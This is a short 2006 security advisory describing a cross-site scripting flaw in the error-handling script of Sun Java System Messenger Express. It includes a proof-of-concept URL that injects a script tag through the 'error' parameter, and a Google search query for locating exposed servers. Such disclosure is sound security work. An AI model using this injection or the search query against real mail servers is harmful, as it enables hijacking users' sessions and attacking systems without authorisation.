Sun java System Messenger Express<br>remote XSS vulnerabilities<br>By: Handrix &lt;handrix_at_morx_org&gt;<br>29 November 2006<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a><br><br>Description:
<br>Sun java System Messenger Express XSS<br><br>The index script&nbsp; is vulnerable to XSS attacks, in functiion errorHTML .<br><br>function errorHTML() {<br>&nbsp; var s=''<br>&nbsp; .<br>&nbsp; .<br>&nbsp; .<br><br>&nbsp; document.write(s) ---&gt; Need more case filetring the 's' var
<br>}<br><br><br>So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.<br><br>Exploit:<br><a href="https://mail.victime.edu/?user=&amp;error=%3Cscript%3Ealert('hakin9');%3C/script%3E">
https://mail.victime.edu/?user=&amp;error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a><br><br>Founded with Google by this dorks :<br>intitle:&quot;Sun Java(tm) System Messenger Express&quot;<br><br>Vulnerable versions :<br>
Sun java System Messenger Express<br>Sun java System Messenger Express6